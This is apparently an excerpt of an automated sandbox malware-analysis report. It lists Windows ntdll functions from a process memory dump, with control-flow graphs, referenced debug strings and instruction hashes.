882->885 886 325ca512-325ca514 883->886 884->885 885->854 885->883 887 325ca516 886->887 888 325ca507-325ca50d 886->888 887->851 889 325ca50f 888->889 890 325ca51b-325ca51d 888->890 889->886 890->862
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: HEAP:
                                                                                                  • API String ID: 3446177414-2466845122
                                                                                                  • Opcode ID: 3a9e14552e9dfd6fc7b023914511e990a72cd19ae2bd4e201d41634065911764
                                                                                                  • Instruction ID: eb0d1eb3b4c4bfd75f5f6614d17fcb71a4ec47a67997f0afa2033f6f1700636b
                                                                                                  • Opcode Fuzzy Hash: 3a9e14552e9dfd6fc7b023914511e990a72cd19ae2bd4e201d41634065911764
                                                                                                  • Instruction Fuzzy Hash: B2A1CCB5A143218FD708CE68C894A1ABBE5FF88754F14492DEA45DB310FB70EE46CB91
                                                                                                  Function 32527550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 891 32527550-32527571 892 32527573-3252758f call 324fe580 891->892 893 325275ab-325275b9 call 32534b50 891->893 898 32564443 892->898 899 32527595-325275a2 892->899 903 3256444a-32564450 898->903 900 325275a4 899->900 901 325275ba-325275c9 call 32527738 899->901 900->893 907 32527621-3252762a 901->907 908 325275cb-325275e1 call 325276ed 901->908 905 32564456-325644c3 call 3257ef10 call 32538f40 RtlDebugPrintTimes BaseQueryModuleData 903->905 906 325275e7-325275f0 call 32527648 903->906 905->906 923 325644c9-325644d1 905->923 906->907 916 325275f2 906->916 911 325275f8-32527601 907->911 908->903 908->906 918 32527603-32527612 call 3252763b 911->918 919 3252762c-3252762e 911->919 916->911 920 32527614-32527616 918->920 919->920 925 32527630-32527639 920->925 926 32527618-3252761a 920->926 923->906 928 325644d7-325644de 923->928 925->926 926->900 927 3252761c 926->927 929 325645c9-325645db call 32532b70 927->929 928->906 930 325644e4-325644ef 928->930 929->900 932 325645c4 call 32534c68 930->932 933 325644f5-3256452e call 3257ef10 call 3253a9c0 930->933 932->929 940 32564546-32564576 call 3257ef10 933->940 941 32564530-32564541 call 3257ef10 933->941 940->906 946 3256457c-3256458a call 3253a690 940->946 941->907 949 32564591-325645ae call 3257ef10 call 3256cc1e 946->949 950 3256458c-3256458e 946->950 949->906 955 325645b4-325645bd 949->955 950->949 955->946 956 325645bf 955->956 956->906
                                                                                                  Strings
                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32564530
                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3256454D
                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32564507
                                                                                                  • ExecuteOptions, xrefs: 325644AB
                                                                                                  • Execute=1, xrefs: 3256451E
                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 32564592
                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32564460
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                  • API String ID: 0-484625025
                                                                                                  • Opcode ID: b4c5958c2c8110e5bc159c3faa3c9a10f786cb161bb7a5418b47e935492f79e8
                                                                                                  • Instruction ID: 63a64e770c8f33b57eb9110fad05c24fcc9e80b19df92ece558da638732b81a3
                                                                                                  • Opcode Fuzzy Hash: b4c5958c2c8110e5bc159c3faa3c9a10f786cb161bb7a5418b47e935492f79e8
                                                                                                  • Instruction Fuzzy Hash: EE51F471A01319AFEB14DAA4DC95FA977B8EF48349F4004E9EA05A71C1EB70AF45CE60
                                                                                                  Function 3250A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1423 3250a170-3250a18f 1424 3250a195-3250a1b1 1423->1424 1425 3250a4ad-3250a4b4 1423->1425 1427 325577f3-325577f8 1424->1427 1428 3250a1b7-3250a1c0 1424->1428 1425->1424 1426 3250a4ba-325577c8 1425->1426 1426->1424 1433 325577ce-325577d3 1426->1433 1428->1427 1430 3250a1c6-3250a1cc 1428->1430 1431 3250a1d2-3250a1d4 1430->1431 1432 3250a5da-3250a5dc 1430->1432 1431->1427 1435 3250a1da-3250a1dd 1431->1435 1432->1435 1436 3250a5e2 1432->1436 1434 3250a393-3250a399 1433->1434 1435->1427 1437 3250a1e3-3250a1e6 1435->1437 1436->1437 1438 3250a1e8-3250a1f1 1437->1438 1439 3250a1fa-3250a1fd 1437->1439 1442 3250a1f7 1438->1442 1443 325577d8-325577e2 1438->1443 1440 3250a203-3250a24b 1439->1440 1441 3250a5e7-3250a5f0 1439->1441 1444 3250a250-3250a255 1440->1444 1441->1440 1446 3250a5f6-3255780c 1441->1446 1442->1439 1445 325577e7-325577f0 call 3257ef10 1443->1445 1447 3250a25b-3250a263 1444->1447 1448 3250a39c-3250a39f 1444->1448 1445->1427 1446->1445 1451 3250a265-3250a269 1447->1451 1452 3250a26f-3250a27d 1447->1452 1448->1452 1454 3250a3a5-3250a3a8 1448->1454 1451->1452 1455 3250a4bf-3250a4c8 1451->1455 1456 3250a283-3250a288 1452->1456 1457 3250a3ae-3250a3be 1452->1457 1454->1457 1458 32557823-32557826 1454->1458 1459 3250a4e0-3250a4e3 1455->1459 1460 3250a4ca-3250a4cc 1455->1460 1461 3250a28c-3250a28e 1456->1461 1457->1458 1463 3250a3c4-3250a3cd 1457->1463 1458->1461 1462 3255782c-32557831 1458->1462 1465 3250a4e9-3250a4ec 1459->1465 1466 3255780e 1459->1466 1460->1452 1464 3250a4d2-3250a4db 1460->1464 1467 3250a294-3250a2ac call 3250a600 1461->1467 1468 32557833 1461->1468 1469 32557838 1462->1469 1463->1461 1464->1461 1470 3250a4f2-3250a4f5 1465->1470 1471 32557819 1465->1471 1466->1471 1476 3250a3d2-3250a3d9 1467->1476 1477 3250a2b2-3250a2da 1467->1477 1468->1469 1473 3255783a-3255783c 1469->1473 1470->1460 1471->1458 1473->1434 1475 32557842 1473->1475 1478 3250a2dc-3250a2de 1476->1478 1479 3250a3df-3250a3e2 1476->1479 1477->1478 1478->1473 1481 3250a2e4-3250a2eb 1478->1481 1479->1478 1480 3250a3e8-3250a3f3 1479->1480 1480->1444 1482 3250a2f1-3250a2f4 1481->1482 1483 325578ed 1481->1483 1485 3250a300-3250a30a 1482->1485 1484 325578f1-32557909 call 3257ef10 1483->1484 1484->1434 1485->1484 1487 3250a310-3250a32c call 3250a760 1485->1487 1491 3250a332-3250a337 1487->1491 1492 3250a4f7-3250a500 1487->1492 1491->1434 1493 3250a339-3250a35d 1491->1493 1494 3250a521-3250a523 1492->1494 1495 3250a502-3250a50b 1492->1495 1496 3250a360-3250a363 1493->1496 1498 3250a525-3250a543 call 324f4428 1494->1498 1499 3250a549-3250a551 1494->1499 1495->1494 1497 3250a50d-3250a511 1495->1497 1500 3250a3f8-3250a3fc 1496->1500 1501 3250a369-3250a36c 1496->1501 1502 3250a5a1-3250a5cb RtlDebugPrintTimes 1497->1502 1503 3250a517-3250a51b 1497->1503 1498->1434 1498->1499 1505 32557847-3255784f 1500->1505 1506 3250a402-3250a405 1500->1506 1507 3250a372-3250a374 1501->1507 1508 325578e3 1501->1508 1502->1494 1522 3250a5d1-3250a5d5 1502->1522 1503->1494 1503->1502 1510 32557855-32557859 1505->1510 1511 3250a554-3250a56a 1505->1511 1506->1511 1512 3250a40b-3250a40e 1506->1512 1513 3250a440-3250a459 call 3250a600 1507->1513 1514 3250a37a-3250a381 1507->1514 1508->1483 1510->1511 1516 3255785f-32557868 1510->1516 1517 3250a570-3250a579 1511->1517 1518 3250a414-3250a42c 1511->1518 1512->1501 1512->1518 1532 3250a57e-3250a585 1513->1532 1533 3250a45f-3250a487 1513->1533 1520 3250a387-3250a38c 1514->1520 1521 3250a49b-3250a4a2 1514->1521 1523 32557892-32557894 1516->1523 1524 3255786a-3255786d 1516->1524 1517->1507 1518->1501 1525 3250a432-3250a43b 1518->1525 1520->1434 1527 3250a38e 1520->1527 1521->1485 1528 3250a4a8 1521->1528 1522->1494 1523->1511 1531 3255789a-325578a3 1523->1531 1529 3255786f-32557879 1524->1529 1530 3255787b-3255787e 1524->1530 1525->1507 1527->1434 1528->1483 1536 3255788e 1529->1536 1537 32557880-32557889 1530->1537 1538 3255788b 1530->1538 1531->1507 1534 3250a489-3250a48b 1532->1534 1535 3250a58b-3250a58e 1532->1535 1533->1534 1534->1520 1540 3250a491-3250a493 1534->1540 1535->1534 1539 3250a594-3250a59c 1535->1539 1536->1523 1537->1531 1538->1536 1539->1496 1541 3250a499 1540->1541 1542 325578a8-325578b1 1540->1542 1541->1521 1542->1541 1543 325578b7-325578bd 1542->1543 1543->1541 1544 325578c3-325578cb 1543->1544 1544->1541 1545 325578d1-325578dc 1544->1545 1545->1544 1546 325578de 1545->1546 1546->1541
                                                                                                  Strings
                                                                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 325578F3
                                                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32557807
                                                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 325577E2
                                                                                                  • SsHd, xrefs: 3250A304
                                                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 325577DD, 32557802
                                                                                                  • Actx , xrefs: 32557819, 32557880
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                  • API String ID: 0-1988757188
                                                                                                  • Opcode ID: 45bee5e28cb7242f79f95e359e1e25f41e90fb55bd2d2f270c61db45a0ad0e31
                                                                                                  • Instruction ID: d069fc8e7744f452963c756c6d469a1c51203b10729537be40567320cba064d0
                                                                                                  • Opcode Fuzzy Hash: 45bee5e28cb7242f79f95e359e1e25f41e90fb55bd2d2f270c61db45a0ad0e31
                                                                                                  • Instruction Fuzzy Hash: 32E1D5746043428FE715CE24CC9075A7BE1BF85368F508A2EEE65CB290DB35DA49CF81
                                                                                                  Function 3250D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32559178
                                                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32559153
                                                                                                  • GsHd, xrefs: 3250D794
                                                                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32559372
                                                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 3255914E, 32559173
                                                                                                  • Actx , xrefs: 32559315
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                  • API String ID: 3446177414-2196497285
                                                                                                  • Opcode ID: 897b6faa3af26ef5540c5df3144d8b790dda4b3a2a78914b53cb44d33ca2d10d
                                                                                                  • Instruction ID: 43496ae2ff16c49cb656d29294a8bb49e75300038b6e6ee29cbd21831ebe0532
                                                                                                  • Opcode Fuzzy Hash: 897b6faa3af26ef5540c5df3144d8b790dda4b3a2a78914b53cb44d33ca2d10d
                                                                                                  • Instruction Fuzzy Hash: 21E19E746053419FE714CF14CC80B5ABBE4FF88758F508A6EE9968B281DB74EA44CF92
                                                                                                  Function 3256FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                  • API String ID: 3446177414-4227709934
                                                                                                  • Opcode ID: 5ca5f5929bce90afab7abbefa5dc61b25dab8cd3dcd822c0d29bd0fa44270783
                                                                                                  • Instruction ID: c1e78fe65050fd79458668111f9d08a9cbf085ee532055a9c5ae8ab2a8512d67
                                                                                                  • Opcode Fuzzy Hash: 5ca5f5929bce90afab7abbefa5dc61b25dab8cd3dcd822c0d29bd0fa44270783
                                                                                                  • Instruction Fuzzy Hash: 43416AB9E01209ABDB01CF98C980AEEBFB5FF48758F101169EC05A7350DB719B41DB90
                                                                                                  Function 3259F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                  • API String ID: 3446177414-3492000579
                                                                                                  • Opcode ID: e8ab014ae787260d5b5995efa93c3099ae74e32cfd631e9f459350d982333a24
                                                                                                  • Instruction ID: b35c62b6b923f6348b3e62cfb9d50406c4191d425a3548377987033d68da8403
                                                                                                  • Opcode Fuzzy Hash: e8ab014ae787260d5b5995efa93c3099ae74e32cfd631e9f459350d982333a24
                                                                                                  • Instruction Fuzzy Hash: 7571FE75911285EFDB01CFA8D4906EDFBF2FF89314F448459E485EB251CB719A81CB90
                                                                                                  Function 324E6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • LdrpLoadShimEngine, xrefs: 3254984A, 3254988B
                                                                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32549885
                                                                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32549843
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32549854, 32549895
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 3446177414-3589223738
                                                                                                  • Opcode ID: b54b64c8b73eb61d96d6aac4e34db8500cc13acfe1c4860f6f408b2246fcb8de
                                                                                                  • Instruction ID: 625fef0fe8eb7a78aaab9a9119b29acfe02abc424fbc0eb053985341489bb614
                                                                                                  • Opcode Fuzzy Hash: b54b64c8b73eb61d96d6aac4e34db8500cc13acfe1c4860f6f408b2246fcb8de
                                                                                                  • Instruction Fuzzy Hash: 24512475A61354DFEB04CFA8CC55BED77A2AB84314F440569F541BF296CB709E82CB80
                                                                                                  Function 3251DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                  • API String ID: 3446177414-3224558752
                                                                                                  • Opcode ID: ededa33447d711a4358a878a3a041687e5d7c17db795dd6b76e05cece255d736
                                                                                                  • Instruction ID: 807393ec663bc2fbed0f1162345591f640bd184554d14bcd2a1f29f239e4351a
                                                                                                  • Opcode Fuzzy Hash: ededa33447d711a4358a878a3a041687e5d7c17db795dd6b76e05cece255d736
                                                                                                  • Instruction Fuzzy Hash: DF412675605711EBFB15CF28C484B5ABBA4FF42365F108969E806973C1CB78BB81CB91
                                                                                                  Function 3259ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • ---------------------------------------, xrefs: 3259EDF9
                                                                                                  • Entry Heap Size , xrefs: 3259EDED
                                                                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3259EDE3
                                                                                                  • HEAP: , xrefs: 3259ECDD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                  • API String ID: 3446177414-1102453626
                                                                                                  • Opcode ID: e8863d4bc25fdbc893e8b1d4024ac410082bc9854c13c706613184e8b21ae936
                                                                                                  • Instruction ID: 3af2a1984413dbcb84005bf44d78b9f078ceffcce707478f461b794a825a7cac
                                                                                                  • Opcode Fuzzy Hash: e8863d4bc25fdbc893e8b1d4024ac410082bc9854c13c706613184e8b21ae936
                                                                                                  • Instruction Fuzzy Hash: 55416C79A51215DFD704CF19C580A99BBB5FB49355B1588AEE409AB210DB31EE82CBC0
                                                                                                  Function 3251DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                  • API String ID: 3446177414-1222099010
                                                                                                  • Opcode ID: 38c409e64e4b94ff9c38258bfdf754e212c7a25b50af3e536f20cd3bf494b00e
                                                                                                  • Instruction ID: 9eda1ac78eb16efa025803ad3e56fbd84a904dca87d16fa4c43cdbeb30a53293
                                                                                                  • Opcode Fuzzy Hash: 38c409e64e4b94ff9c38258bfdf754e212c7a25b50af3e536f20cd3bf494b00e
                                                                                                  • Instruction Fuzzy Hash: 4F312975112784EFFB26CB28C509B497BE8EF02765F004999E44397651CBB5BB80CF51
                                                                                                  Function 324F9046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: $$@
                                                                                                  • API String ID: 3446177414-1194432280
                                                                                                  • Opcode ID: 9940cf9413c2b4bca7fe437f6a7726d13ac5ac0d625b79ec5ed48bfbe20127d0
                                                                                                  • Instruction ID: 8438a6985cd5891791a714fde2fc6ee329a818666cb9a9da799043ded17ccee3
                                                                                                  • Opcode Fuzzy Hash: 9940cf9413c2b4bca7fe437f6a7726d13ac5ac0d625b79ec5ed48bfbe20127d0
                                                                                                  • Instruction Fuzzy Hash: 24813BB1D002699BDB25CF54CC40BDEB7B8AB48754F5045EAE909B7240EB709F85CFA0
                                                                                                  Function 32524C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 3256344A, 32563476
                                                                                                  • LdrpFindDllActivationContext, xrefs: 32563440, 3256346C
                                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 32563466
                                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 32563439
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                  • API String ID: 3446177414-3779518884
                                                                                                  • Opcode ID: 70bbb4a6f63fa99e54dd6b38b6c9e559ea56ea53298255b4b94132f20c9eff96
                                                                                                  • Instruction ID: 3efd17fb55a423b0cff996d2b118995fff681f6108ebe99aae7784239a5df57b
                                                                                                  • Opcode Fuzzy Hash: 70bbb4a6f63fa99e54dd6b38b6c9e559ea56ea53298255b4b94132f20c9eff96
                                                                                                  • Instruction Fuzzy Hash: 52310EB9A41351FFF7159F0CC884B6ABB94FB4079AF42A566E800771D1DB609F80C6B1
                                                                                                  Function 324EF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 3446177414-3610490719
                                                                                                  • Opcode ID: f163b202d18ce3158fceec8e108e77ceb5ecf1a1d1a1d4ace257d381e2776324
                                                                                                  • Instruction ID: 9cc5a9df2f07f80a7f2c726daae8b513afe4d57334eba945ce74ce108738e262
                                                                                                  • Opcode Fuzzy Hash: f163b202d18ce3158fceec8e108e77ceb5ecf1a1d1a1d4ace257d381e2776324
                                                                                                  • Instruction Fuzzy Hash: 38911475245740EFF31ACF24C880B6EB7A5BF84785F420559E9829B281DF74EA81CBD2
                                                                                                  Function 32510AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • LdrpCheckModule, xrefs: 32559F24
                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 32559F1C
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32559F2E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
